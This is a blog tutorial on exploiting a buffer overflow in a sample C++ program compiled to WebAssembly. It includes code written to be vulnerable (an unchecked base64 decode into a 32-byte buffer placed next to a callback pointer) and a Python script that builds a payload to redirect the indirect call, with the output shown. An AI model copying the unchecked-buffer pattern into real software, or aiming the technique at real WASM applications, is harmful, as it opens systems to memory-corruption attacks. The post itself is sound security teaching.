Basic WebAssembly buffer overflow exploitation

Home Basic WebAssembly buffer overflow exploitation

Basic WebAssembly buffer overflow exploitation

26th Jun 2022 webassembly exploitation buffer-overflow

WebAssembly is a binary format designed and optimized for high performance execution on the web, although it can also be used in standalone applications. Even though WebAssembly uses sandboxed execution, certain types of bugs may still be exploitable within the context of the WASM binary. Depending on the layout of the entire application, external calls, presence of untrusted data inputs and other factors, such a bug may have less important or very severe consequences.

Note: This blog post is not about exploiting WebAssembly itself. It provides sandboxed execution and was never designed to prevent memory corruptions within the application itself. We will be going through exploitation of a basic buffer overflow in an example application compiled to WebAssembly. Triggering a buffer overflow inside WebAssembly does not escape the sandbox and it does not corrupt memory outside the sandbox, the only affected memory is the linear memory of the WebAssembly module.

Here we'll demonstrate a simple buffer overflow exploit in code intentionally written to be exploitable for the purpose of this blog post. Real world applications may require more or less work depending on circumstances.

Sample application code

// void Base64::Decode(const std::string& input, char* out);
#include "base64.hpp"

#include <cstdio>
#include <string>

char* CallbackFunc_1()
{
    static char example_data[] = "some public data";

    return example_data;
}

char* CallbackFunc_2()
{
    static char example_data[] = "computed private data";

    return example_data;
}

struct ExampleStruct
{
    using DataProcessCallback = char*(*)();

    char name[32];
    DataProcessCallback cb;

    ExampleStruct(int type, char const* encoded_name)
    {
        if (type == 0)
            cb = CallbackFunc_1;
        else
            cb = CallbackFunc_2;

        std::memset(name, 0, sizeof(name));
        Base64::Decode(encoded_name, name);
    }
};

int main(int argc, char* argv[])
{
    if (argc != 3)
    {
        std::printf("Usage: %s <type> <name>\n", argv[0]);
        return 1;
    }

    int type = std::stoi(argv[1]);

    ExampleStruct e(type, argv[2]);

    std::printf("Hello %s: %s\n", e.name, e.cb());

    return 0;
}

The code is intentionally kept simple and contains a bug for the purpose of the example. The application takes two arguments: an integer and a base64 encoded string. ExampleStruct is then initialized using these arguments: based on the integer a callback function is initialized and base64 string is decoded into the name field. Further in the code, we print the name and output of the callback.

The above code is structured this way simply to generate a functionality in the simplest possible way, but let's pretend that integer is not console input and we cannot actually provide it through command line arguments and that we are currently limited to value 0, which will give us output of the first callback function ("some public data").

Compiling and running the application

$ mkdir out
$ emcc -O2 example.cpp -o out/example.js
$ echo -n 'John Doe' | base64
Sm9obiBEb2U=
$ node out/example.js 0 Sm9obiBEb2U=
Hello John Doe: some public data
$ node out/example.js 1 Sm9obiBEb2U=
Hello John Doe: computed private data

The bug

The structure has a char[] name field of hardcoded size 32. The Base64::Decode() function takes a char* pointer for output buffer. There are no bound checks, base64 input is decoded into the buffer with a possibility of overwriting it. Callback member follows the name field, meaning that any buffer overflow on the name field overwrites the callback pointer.

Introduction to relevant executable format details

If you are familiar with writing exploits on x86/x64 architectures with modern operating systems, you're aware that the same type of bug is exploitable there. However, to successfully exploit it on such platforms, you would have to combine this bug with an info leak in order to get a valid function (or any other code) address due to ASLR.

In WebAssembly, things work slightly differently. For start, there's no ASLR. Functions are referred to by their indexes rather than addresses. In addition to that, unlike on x86/x64 which allows you to call any valid executable address (no matter whether it's a function address, an address into middle of a function or simply any address marked with executable code), you can only call into existing functions. In addition to that, WebAssembly enforces that called functions are of expected types. The binary format contains a types section that describes all function prototypes (function argument types and return value).

For example:

$ ~/wabt/bin/wasm2wat out/example.wasm > example.wat

If we inspect the wat file, which is textual representation of the module and assembled instructions, we'll see the following type section:

(type (;0;) (func (param i32) (result i32)))
(type (;1;) (func (param i32 i32 i32)))
(type (;2;) (func (param i32)))
(type (;3;) (func (param i32 i32 i32) (result i32)))
(type (;4;) (func (param i32 i32)))
(type (;5;) (func (param i32 i32 i32 i32)))
(type (;6;) (func (result i32)))
(type (;7;) (func (param i32 i32 i32 i32 i32)))
(type (;8;) (func (param i32 i32 i32 i32 i32 i32)))
(type (;9;) (func))
(type (;10;) (func (param i32 i32) (result i32)))
(type (;11;) (func (param i32 i32 i32 i32 i32) (result i32)))
(type (;12;) (func (param i32 i64 i32) (result i64)))
(type (;13;) (func (param i32 i32 i32 i32) (result i32)))
(type (;14;) (func (param i32 f64 i32 i32 i32 i32) (result i32)))

Further, if we go to the bottom of the file and look around the data sections, we'll locate the strings we've used in the example:

(data (;14;) (i32.const 2624) "some public data")
(data (;15;) (i32.const 2656) "computed private data\00\00\00\05")

Going through the code, we can easily locate the two callback functions by searching for the addresses of these data sections, 2624 and 2656:

(func (;10;) (type 6) (result i32)
  i32.const 2624)
(func (;11;) (type 6) (result i32)
  i32.const 2656)

Our callback functions have indexes 10 and 11. We want to make the code call function 11 by overwriting the pointer to it. There's a difference to how function pointers work in WebAssembly compared to x86/x64 and similar architectures where a function pointer is the address of the function. Function pointers in WebAssembly are not function "addresses" or their indexes, but rather their indexes in the table/elem sections (starting from 1).

Table section:

(table (;0;) 24 24 funcref)

Elem section:

(elem (;0;) (i32.const 1) func 11 10 17 16 18 38 39 51 55 21 21 56 55 58 70 68 61 55 69 67 62 55 63)

We can conclude that func_11 (CallbackFunc_2) has elem index 1 and func_10 (CallbackFunc_1) has elem index 2.

For demonstration purpose, we can print the addresses of the two functions by adding the following code to beginning of the main() function:

std::printf("CallbackFunc_1: %p, CallbackFunc_2: %p\n", &CallbackFunc_1, &CallbackFunc_2);

And after executing the application, we'll get the following output:

$ node out/example.js
CallbackFunc_1: 0x2, CallbackFunc_2: 0x1

A compiler populates the elem section with indexes of all functions which have its addresses taken (e.g. assignment to a pointer, printing to console, etc). You cannot override a function pointer to a function which exists within the module, but is not referenced in the elem section.

WebAssembly is a stack based virtual machine. Direct calls are performed using the call instruction. For example, if we were calling function 10 directly, we'd have the following code:

call 10

Our function takes no arguments, but if it was taking two 32bit integers, we'd have the following code:

i32.const 0
i32.const 0
call 10

And the stack would look like this:

[ previous items ]
0
0

Which would be calling func_10(0, 0). If the function returns a value, it would be the first item on the stack when the call instruction is done with execution.

But we're not dealing with direct calls in the vulnerable code example, we're dealing with indirect calls which use a different instruction, call_indirect.

i32.load offset=32
call_indirect (type 6)

The i32.load instruction loads the callback pointer on the stack. You may notice the (type 6) instruction operand, which is the expected type of the pointed-to function. When encountering the call_indirect instruction, the WebAssembly runtime will verify that the function it's going to call matches the type specified as the instruction operand. If there's a mismatch, you'll get a runtime error, meaning that you cannot call arbitrary functions that have different prototypes.

If the function was taking two integer arguments, the above example would now look like this:

i32.const 0
i32.const 0
i32.load offset=32
call_indirect (type 6)

And the stack would look like this:

[ previous items ]
0
0
elem index

Exploitation

We have a 32 byte char array, followed by a 32 bit "pointer". If the input name is "John Doe", we'll have the following layout of the struct in memory ("John Doe", 24 zero bytes, 4 bytes for the pointer "2"):

Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

00000000  4A 6F 68 6E 20 44 6F 65 00 00 00 00 00 00 00 00  John Doe........
00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000020  02 00 00 00                                      ....

What we want to get is replacing 02 with 01, which is the elem index of CallbackFunc_2:

Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

00000000  4A 6F 68 6E 20 44 6F 65 00 00 00 00 00 00 00 00  John Doe........
00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000020  01 00 00 00

A python script that generates the whole input for us:

#!/usr/bin/python3

import base64

data = str.encode('John Doe')

while len(data) != 32:
    data += b'\x00'

data += b'\x01\x00\x00\x00'

print(base64.b64encode(data).decode('utf-8'))

Running the payload:

$ ./make_payload.py
Sm9obiBEb2UAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAA
$ node out/example.js 0 Sm9obiBEb2UAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAA
Hello John Doe: computed private data

If we change the script to generate data for other indexes in the elem table, we'll get a runtime error described earlier in this post because the function doesn't have the same prototype:

# index 3
$ node out/example.js 0 Sm9obiBEb2UAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAA
[ ... ]
RuntimeError: function signature mismatch
at main (<anonymous>:wasm-function[12]:0x926)
[ ... ]

Conclusion

WebAssembly provides sandboxed execution for Web which by itself provides significant security. A bug such as the one described in this post on a website which doesn't consume external untrusted data (e.g. data retrieved from an API provided by a third-party host) would not be of high severity because the website itself would have to feed "vulnerable" data through javascript to the WASM module, but in that case the entity hosting the website may already execute any valid WASM code and doesn't need to exploit its own bugs. However, for example, if the hosted website retrieves data from a third-party API/website/service through javascript and feeds it into WASM module, such a bug may be of high severity depending on what further exploitation the module allows because the third-party host may cause unintended execution. The same goes for standalone WASM applications (e.g. running on servers) consuming untrusted data from a public API, such a bug could have more severe consequences.

Buffer overflow bug, specifically this one, may be exploited in WebAssembly much easier than the same type of bug in applications compiled for x86/x64 architectures (due to ASLR, DEP and other mitigations), but only if a lot of requirements are met. A meaningful exploitation, rather than just a DoS, is possible only if the set of functions we have available for overriding provide meaningful execution. Exploitation of a bug in a real world WASM application may require significantly more work than we went through in this post (which is intentionally made simple for easier demonstration).

Hopefully you've enjoyed reading and found the topic interesting. We will try to cover other exploitation techniques in the context of WebAssembly in the future, covering different types of bugs and requirements for their exploitation.

In addition to reverse engineering and exploitation in WebAssembly, we will also cover code obfuscation and provide examples for it in the future, from our WebAssembly obfuscator which is being finished and will be available for production use in the near future. Make sure to also check out our main website.